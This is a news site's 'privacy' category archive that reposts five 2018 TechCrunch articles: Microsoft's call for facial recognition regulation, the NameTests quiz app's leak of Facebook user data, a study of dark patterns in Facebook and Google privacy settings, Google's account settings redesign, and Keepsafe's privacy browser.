Timesdelhi.com

July 18, 2018
Category archive

privacy

As facial recognition technology becomes pervasive, Microsoft (yes, Microsoft) issues a call for regulation

in Artificial Intelligence/Delhi/facial recognition/Government/India/Microsoft/Opinion/Politics/privacy/TC by

Technology companies have a privacy problem. They’re terribly good at invading ours and terribly negligent at protecting their own.

And with the push by technologists to map, identify and index our physical as well as virtual presence with biometrics like face and fingerprint scanning, the increasing digital surveillance of our physical world is causing some of the companies that stand to benefit the most to call out to government to provide some guidelines on how they can use the incredibly powerful tools they’ve created.

That’s what’s behind today’s call from Microsoft President Brad Smith for government to start thinking about how to oversee the facial recognition technology that’s now at the disposal of companies like Microsoft, Google, Apple and government security and surveillance services across the country and around the world.

In what companies have framed as a quest to create “better,” more efficient and more targeted services for consumers, they have tried to solve the problem of user access by moving to increasingly passive (for the user) and intrusive (by the company) forms of identification — culminating in features like Apple’s Face ID and the frivolous filters that Snap overlays over users’ selfies.

Those same technologies are also being used by security and police forces in ways that have gotten technology companies into trouble with consumers or their own staff. Amazon has been called to task for its work with law enforcement, Microsoft’s own technologies have been used to help identify immigrants at the border (indirectly aiding in the separation of families and the virtual and physical lockdown of America against most forms of immigration) and Google faced an internal company revolt over the facial recognition work it was doing for the Pentagon.

Smith posits this nightmare scenario:

Imagine a government tracking everywhere you walked over the past month without your permission or knowledge. Imagine a database of everyone who attended a political rally that constitutes the very essence of free speech. Imagine the stores of a shopping mall using facial recognition to share information with each other about each shelf that you browse and product you buy, without asking you first. This has long been the stuff of science fiction and popular movies – like “Minority Report,” “Enemy of the State” and even “1984” – but now it’s on the verge of becoming possible.

What’s impressive about this is the intimation that it isn’t already happening (and that Microsoft isn’t enabling it). Across the world, governments are deploying these tools right now as ways to control their populations (the ubiquitous surveillance state that China has assembled, and is investing billions of dollars to upgrade, is just the most obvious example).

In this moment when corporate innovation and state power are merging in ways that consumers are only just beginning to fathom, executives who have to answer to a buying public are now pleading for government to set up some rails. Late capitalism is weird.

But Smith’s advice is prescient. Companies do need to get ahead of the havoc their innovations can wreak on the world, and they can look good while doing nothing by hiding their own abdication of responsibility on the issue behind the government’s.

“In a democratic republic, there is no substitute for decision making by our elected representatives regarding the issues that require the balancing of public safety with the essence of our democratic freedoms. Facial recognition will require the public and private sectors alike to step up – and to act,” Smith writes.

The fact is, something does, indeed, need to be done.

As Smith writes, “The more powerful the tool, the greater the benefit or damage it can cause. The last few months have brought this into stark relief when it comes to computer-assisted facial recognition – the ability of a computer to recognize people’s faces from a photo or through a camera. This technology can catalog your photos, help reunite families or potentially be misused and abused by private companies and public authorities alike.”

All of this takes on faith that the technology actually works as advertised. And the problem is, right now, it doesn’t.

In an op-ed earlier this month, Brian Brackeen, the chief executive of a startup working on facial recognition technologies, pulled back the curtains on the industry’s not-so-secret huge problem.

Facial recognition technologies, used in the identification of suspects, negatively affects people of color. To deny this fact would be a lie.

And clearly, facial recognition-powered government surveillance is an extraordinary invasion of the privacy of all citizens — and a slippery slope to losing control of our identities altogether.

There’s really no “nice” way to acknowledge these things.

Smith, himself admits that the technology has a long way to go before it’s perfect. But the implications of applying imperfect technologies are vast — and in the case of law enforcement, not academic. Designating an innocent bystander or civilian as a criminal suspect influences how police approach an individual.

Those instances, even if they amount to only a handful, would lead me to argue that these technologies have no business being deployed in security situations.

As Smith himself notes, “Even if biases are addressed and facial recognition systems operate in a manner deemed fair for all people, we will still face challenges with potential failures. Facial recognition, like many AI technologies, typically have some rate of error even when they operate in an unbiased way.”

While Smith lays out the problem effectively, he’s less clear on the solution. He’s called for a government “expert commission” to be empaneled as a first step on the road to eventual federal regulation.

That we’ve gotten here is an indication of how bad things actually are. It’s rare that a tech company has pleaded so nakedly for government intervention into an aspect of its business.

But here’s Smith writing, “We live in a nation of laws, and the government needs to play an important role in regulating facial recognition technology. As a general principle, it seems more sensible to ask an elected government to regulate companies than to ask unelected companies to regulate such a government.”

Given the current state of affairs in Washington, Smith may be asking too much. Which is why perhaps the most interesting — and admirable — call from Smith in his post is for technology companies to slow their roll.

We recognize the importance of going more slowly when it comes to the deployment of the full range of facial recognition technology,” writes Smith. “Many information technologies, unlike something like pharmaceutical products, are distributed quickly and broadly to accelerate the pace of innovation and usage. ‘Move fast and break things’ became something of a mantra in Silicon Valley earlier this decade. But if we move too fast with facial recognition, we may find that people’s fundamental rights are being broken.”

News Source = techcrunch.com

Yet another massive Facebook fail: Quiz app leaked data on ~120M users for years

in Advertising Tech/Aleksandr Kogan/Cambridge Analytica/data breach/data misuse/Delhi/Europe/Facebook/India/Mark Zuckerberg/Policy/Politics/privacy/quiz apps/Security/Social/social media/vulnerability by

Facebook knows the historical app audit it’s conducting in the wake of the Cambridge Analytica data misuse scandal is going to result in a tsunami of skeletons tumbling out of its closet.

It’s already suspended around 200 apps as a result of the audit — which remains ongoing, with no formal timeline announced for when the process (and any associated investigations that flow from it) will be concluded.

CEO Mark Zuckerberg announced the audit on March 21, writing then that the company would “investigate all apps that had access to large amounts of information before we changed our platform to dramatically reduce data access in 2014, and we will conduct a full audit of any app with suspicious activity”.

But you do have to question how much the audit exercise is, first and foremost, intended to function as PR damage limitation for Facebook’s brand — given the company’s relaxed response to a data abuse report concerning a quiz app with ~120M monthly users, which it received right in the midst of the Cambridge Analytica scandal.

Because despite Facebook being alerted about the risk posed by the leaky quiz apps in late April — via its own data abuse bug bounty program — they were still live on its platform a month later.

It took about a further month for the vulnerability to be fixed.

And, sure, Facebook was certainly busy over that period. Busy dealing with a major privacy scandal.

Perhaps the company was putting rather more effort into pumping out a steady stream of crisis PR — including taking out full page newspaper adverts (where it wrote that: “we have a responsibility to protect your information. If we can’t, we don’t deserve it”) — vs actually ‘locking down the platform’, per its repeat claims, even though the company’s long and rich privacy-hostile history suggests otherwise.

Let’s also not forget that, in early April, Facebook quietly confessed to a major security flaw of its own — when it admitted that an account search and recovery feature had been abused by “malicious actors” who, over what must have been a period of several years, had been able to surreptitiously collect personal data on a majority of Facebook’s ~2BN users — and use that intel for whatever they fancied.

So Facebook users already have plenty reasons to doubt the company’s claims to be able to “protect your information”. But this latest data fail facepalm suggests it’s hardly scrambling to make amends for its own stinkingly bad legacy either.

Change will require regulation. And in Europe that has arrived, in the form of the GDPR.

Although it remains to be seen whether Facebook will face any data breach complaints in this specific instance, i.e. for not disclosing to affected users that their information was at risk of being exposed by the leaky quiz apps.

The regulation came into force on May 25 — and the javascript vulnerability was not fixed until June. So there may be grounds for concerned consumers to complain.

Which Facebook data abuse victim am I?

Writing in a Medium post, the security researcher who filed the report — self-styled “hacker” Inti De Ceukelaire — explains he went hunting for data abusers on Facebook’s platform after the company announced a data abuse bounty on April 10, as the company scrambled to present a responsible face to the world following revelations that a quiz app running on its platform had surreptitiously harvested millions of users’ data — data that had been passed to a controversial UK firm which intended to use it to target political ads at US voters.

De Ceukelaire says he began his search by noting down what third party apps his Facebook friends were using — finding quizzes were one of the most popular apps. Plus he already knew quizzes had a reputation for being data-suckers in a distracting wrapper. So he took his first ever Facebook quiz, from a brand called NameTests.com, and quickly realized the company was exposing Facebook users’ data to “any third-party that requested it”.

The issue was that NameTests was displaying the quiz taker’s personal data (such as full name, location, age, birthday) in a javascript file — thereby potentially exposing the identify and other data on logged in Facebook users to any external website they happened to visit.

He also found it was providing an access token that allowed it to grant even more expansive data access permissions to third party websites — such as to users’ Facebook posts, photos and friends.

It’s not clear exactly why — but presumably relates to the quiz app company’s own ad targeting activities. (Its privacy policy states: “We work together with various technological partners who, for example, display advertisements on the basis of user data. We make sure that the user’s data is pseudonymised (e.g. no clear data such as names or e-mail addresses) and that users have simple rights of revocation at their disposal. We also conclude special data protection agreements with our partners, in which they commit themselves to the protection of user data.” — which sounds great until you realize its javascript was just leaking people’s personally identified data… [facepalm])

“Depending on what quizzes you took, the javascript could leak your facebook ID, first name, last name, language, gender, date of birth, profile picture, cover photo, currency, devices you use, when your information was last updated, your posts and statuses, your photos and your friends,” writes De Ceukelaire.

He reckons people’s data had been being publicly exposed since at least the end of 2016.

On Facebook, NameTests describes its purpose thusly: “Our goal is simple: To make people smile!” — adding that its quizzes are intended as a bit of “fun”.

It doesn’t shout so loudly that the ‘price’ for taking one of its quizzes, say to find out what Disney princess you ‘are’, or what you could look like as an oil painting, is not only that it will suck out masses of your personal data (and potentially your friends’ data) from Facebook’s platform for its own ad targeting purposes but was also, until recently, that your and other people’s information could have been exposed to goodness knows who, for goodness knows what nefarious purposes… 

The Facebook-Cambridge Analytica data misuse scandal has underlined that ostensibly frivolous social data can end up being repurposed for all sorts of manipulative and power-grabbing purposes. (And not only can end up, but that quizzes are deliberately built to be data-harvesting tools… So think of that the next time you get a ‘take this quiz’ notification asking ‘what is in your fact file?’ or ‘what has your date of birth imprinted on you’? And hope ads is all you’re being targeted for… )

De Ceukelaire found that NameTests would still reveal Facebook users’ identity even after its app was deleted.

“In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality,” he writes.

“I would imagine you wouldn’t want any website to know who you are, let alone steal your information or photos. Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends. More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends,” he adds, fleshing out the risks for affected Facebook users.

As well as alerting Facebook to the vulnerability, De Ceukelaire says he contacted NameTests — and they claimed to have found no evidence of abuse by a third party. They also said they would make changes to fix the issue.

We’ve reached out to NameTests’ parent company — a German firm called Social Sweethearts — for comment. Its website touts a “data-driven approach” — and claims its portfolio of products achieve “a global organic reach of several billion page views per month”.

After De Ceukelaire reported the problem to Facebook, he says he received an initial response from the company on April 30 saying they were looking into it. Then, hearing nothing for some weeks, he sent a follow up email, on May 14, asking whether they had contacted the app developers.

A week later Facebook replied saying it could take three to six months to investigate the issue (i.e. the same timeframe mentioned in their initial automated reply), adding they would keep him in the loop.

Yet at that time — which was a month after his original report — the leaky NameTests quizzes were still up and running,  meaning Facebook users’ data was still being exposed and at risk. And Facebook knew about the risk.

The next development came on June 25, when De Ceukelaire says he noticed NameTests had changed the way they process data to close down the access they had been exposing to third parties.

Two days later Facebook also confirmed the flaw in writing, admitting: “[T]his could have allowed an attacker to determine the details of a logged-in user to Facebook’s platform.”

It also told him it had confirmed with NameTests the issue had been fixed. And its apps continue to be available on Facebook’s platform — suggesting Facebook did not find the kind of suspicious activity that has led it to suspend other third party apps. (At least, assuming it conducted an investigation.)

Facebook paid out a $4,000 x2 bounty to a charity under the terms of its data abuse bug bounty program — and per De Ceukelaire’s request.

We asked it what took it so long to respond to the data abuse report, especially given the issue was so topical when De Ceukelaire filed the report. But Facebook declined to answer specific questions.

Instead it sent us the following statement, attributed to Ime Archibong, its VP of product partnerships:

A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.

Facebook also claims it received De Ceukelaire’s report on April 27, rather than April 22, as he recounts it. Though it’s possible the former date is when Facebook’s own staff retrieved the report from its systems. 

Beyond displaying a disturbingly relaxed attitude to other people’s privacy — which risks getting Facebook into regulatory trouble, given GDPR’s strict requirements around breach disclosure, for example — the other core issue of concern here is the company’s apparent failure to enforce its own developer policy. 

The underlying issue is whether or not Facebook performs any checks on apps running on its platform. It’s no good having T&Cs if you don’t have any active processes to enforce your T&Cs. Rules without enforcement aren’t worth the paper they’re written on.

Historical evidence suggests Facebook did not actively enforce its developer T&Cs — even if it’s now “locking down the platform”, as it claims, as a result of so many privacy scandals. 

The quiz app developer at the center of the Cambridge Analytica scandal, Aleksandr Kogan — who harvested and sold/passed Facebook user data to third parties — has accused Facebook of essentially not having a policyHe contends it is therefore Facebook who is responsible for the massive data abuses that have played out on its platform — only a portion of which have so far come to light. 

Fresh examples such as NameTests’ leaky quiz apps merely bolster the case Kogan made for Facebook being the guilty party where data misuse is concerned. After all, if you built some stables without any doors at all would you really blame your horses for bolting?

News Source = techcrunch.com

Study calls out ‘dark patterns’ in Facebook and Google that push users towards less privacy

in Delhi/Facebook/GDPR/Google/India/Microsoft/Politics/privacy/Social by

More scrutiny than ever is in place on the tech industry, and while high-profile cases like Mark Zuckerberg’s appearance in front of lawmakers garner headlines, there are subtler forces at work. This study from a Norway watchdog group eloquently and painstakingly describes the ways that companies like Facebook and Google push their users towards making choices that negatively affect their own privacy.

It was spurred, like many other new inquiries, by Europe’s GDPR, which has caused no small amount of consternation among companies for whom collecting and leveraging user data is their main source of income.

The report (PDF) goes into detail on exactly how these companies create an illusion of control over your data while simultaneously nudging you towards making choices that limit that control.

Although the companies and their products will be quick to point out that they are in compliance with the requirements of the GDPR, there are still plenty of ways in which they can be consumer-unfriendly.

In going through a set of privacy popups put out in May by Facebook, Google, and Microsoft, the researchers found that the first two especially feature “dark patterns, techniques and features of interface design mean to manipulate users…used to nudge users towards privacy intrusive options.”

Flowchart illustrating the Facebook privacy options process – the green boxes are the “easy” route.

It’s not big obvious things — in fact, that’s the point of these “dark patterns”: that they are small and subtle yet effective ways of guiding people towards the outcome preferred by the designers.

For instance, in Facebook and Google’s privacy settings process, the more private options are simply disabled by default, and users not paying close attention will not know that there was a choice to begin with. You’re always opting out of things, not in. To enable these options is also a considerably longer process: 13 clicks or taps versus 4 in Facebook’s case.

That’s especially troubling when the companies are also forcing this action to take place at a time of their choosing, not yours. And Facebook added a cherry on top, almost literally, with the fake red dots that appeared behind the privacy popup, suggesting users had messages and notifications waiting for them even if that wasn’t the case.

When choosing the privacy-enhancing option, such as disabling face recognition, users are presented with a tailored set of consequences: “we won’t be able to use this technology if a stranger uses your photo to impersonate you,” for instance, to scare the user into enabling it. But nothing is said about what you will be opting into, such as how your likeness could be used in ad targeting or automatically matched to photos taken by others.

Disabling ad targeting on Google, meanwhile, warns you that you will not be able to mute some ads going forward. People who don’t understand the mechanism of muting being referred to here will be scared of the possibility — what if an ad pops up at work or during a show and I can’t mute it? So they agree to share their data.

Before you make a choice, you have to hear Facebook’s case.

In this way users are punished for choosing privacy over sharing, and are always presented only with a carefully curated set of pros and cons intended to cue the user to decide in favor of sharing. “You’re in control,” the user is constantly told, though those controls are deliberately designed to undermine what control you do have and exert.

Microsoft, while guilty of the biased phrasing, received much better marks in the report. Its privacy setup process put the less and more private options right next to each other, presenting them as equally valid choices rather than some tedious configuration tool that might break something if you’re not careful. Subtle cues do push users towards sharing more data or enabling voice recognition, but users aren’t punished or deceived the way they are elsewhere.

You may already have been aware of some of these tactics, as I was, but it makes for interesting reading nevertheless. We tend to discount these things when it’s just one screen here or there, but seeing them all together along with a calm explanation of why they are the way they are makes it rather obvious that there’s something insidious at play here.

News Source = techcrunch.com

Google adds a search feature to account settings to ease use

in Advertising Tech/Delhi/India/Policy/Politics/privacy/Security/TC by

Google has announced a refresh of the Google Accounts user interface. The changes are intended to make it easier for users to navigate settings and review data the company has associated with an account — including information relating to devices, payment methods, purchases, subscriptions, reservations, contacts and other personal info.

The update also makes security and privacy options more prominent, according to Google.

“To help you better understand and take control of your Google Account, we’ve made all your privacy options easy to review with our new intuitive, user-tested design,” it writes. “You can now more easily find your Activity controls in the Data & Personalization tab and choose what types of activity data are saved in your account to make Google work better for you.

“There, you’ll also find the recently updated Privacy Checkup that helps you review your privacy settings and explains how they shape your experience across Google services.”

Android users will get the refreshed Google Account interface first, with iOS and web coming later this year.

Last September the company also refreshed Google Dashboard — to make it easier to use and better integrate it into other privacy controls.

While in October it outed a revamped Security Checkup feature, offering an overview of account security that includes personalized recommendations. The same month it also launched a free, opt-in program aimed at users who believe their accounts to be at particularly high risk of targeted online attacks.

And in January it announced new ad settings controls, also billed as boosting transparency and control. So settings related updates have been coming pretty thick and fast from the ad targeting tech giant.

The latest refresh comes at a time when many companies have been rethinking their approach to security and privacy as a result of a major update to the European Union’s data protection framework which applies to entities processing EU people’s data regardless of where that data is being crunched.

Google also announced a raft of changes to its privacy policy as a direct compliance response with GDPR back in May — saying it was making the policy clearer and easier to navigate, and adding more detail and explanations. It also updated user controls at that time, simplifying on/off switches for things like location data collection and web and app activity.

So that legal imperative to increase visibility and user controls at the core of digital empires looks to be generating uplift that’s helping to raise the settings bar across entire product suites. Which is good news for users.

As well as rethinking how Google Account settings are laid out, the updated “experience” adds some new functions intended to make it easier for people to find the settings they’re looking for too.

Notably a new search functionality for locating settings or specific info within an account — such as how to change a password. Which sounds like a really handy addition. There’s also a new dedicated support section offering help with common tasks, and answers from community experts.

And while it’s certainly welcome to see a search expert like Google adding a search feature to help people gain more control over their personal data, you do have to wonder what took it so long to come up with that idea.

Controls are only as useful as they are easy to use, of course. And offering impenetrable and/or bafflingly complex settings has, shamefully, been the historical playbook of the tech industry — as a socially engineered pathway to maximize data gathering via obfuscation (and obtain consent by confusion).

Again, the GDPR makes egregious personal data heists untenable over the long term — at least where the regulation has jurisdiction.

And while built-in opacity around technology system operation is something regulators are really only beginning to get to grips with — and much important work remains to be done to put vital guardrails in place, such as around the use of personal data for political ad targeting, for instance, or to ensure AI blackboxes can’t bake in bias — several major privacy scandals have knocked the sheen off big tech’s algorithmic pandora’s boxes in recent years. And politicians are leaning into the techlash.

So, much like all these freshly redesigned settings menus, the direction of regulatory travel looks pretty clear — even if the pace of progress is never as disruptive as the technologies themselves.

News Source = techcrunch.com

Keepsafe launches a privacy-focused mobile browser

in Apps/Delhi/India/Keepsafe/mobile/Politics/privacy/Startups by

Keepsafe, the company behind the private photo app of the same name, is expanding its product lineup today with the release of a mobile web browser.

Co-founder and CEO Zouhair Belkoura argued that all of Keepsafe’s products (which also include a VPN app and a private phone number generator) are united not just by a focus on privacy, but by a determination to make those features simple and easy-to-understand — in contrast to what Belkoura described as “how security is designed in techland,” with lots of jargon and complicated settings.

Plus, when it comes to your online activity, Belkoura said there are different levels of privacy. There’s the question of the government and large tech companies accessing our personal data, which he argued people care about intellectually, but “they don’t really care about it emotionally.”

Then there’s “the nosy neighbor problem,” which Belkoura suggested is something people feel more strongly about: “A billion people are using Gmail and it’s scanning all their email [for advertising], but if I were to walk up to you and say, ‘Hey, can I read your email?’ you’d be like, ‘No, that’s kind of weird, go away.’ ”

It looks like Keepsafe is trying to tackle both kinds of privacy with its browser. For one thing, you can lock the browser with a PIN (it also supports Touch ID, Face ID and Android Fingerprint).

Then once you’re actually browsing, you can either do it in normal tabs, where social, advertising and analytics trackers are blocked (you can toggle which kinds of trackers are affected), but cookies and caching are still allowed — so you stay logged in to websites, and other session data is retained. But if you want an additional layer of privacy, you can open a private tab, where everything gets forgotten as soon as you close it.

While you can get some of these protections just by turning on private/incognito mode in a regular browser, Belkoura said there’s a clarity for consumers when an app is designed specifically for privacy, and the app is part of a broader suite of privacy-focused products. In addition, he said he’s hoping to build meaningful integrations between the different Keepsafe products.

Keepsafe Browser is available for free on iOS and Android.

When asked about monetization, Belkoura said, “I don’t think that the private browser per se is a good place to directly monetize … I’m more interested in saying this is part of the Keepsafe suite and there are other parts of the Keepsafe Suite that we’ll charge you money for.”

News Source = techcrunch.com

1 2 3 23
Go to Top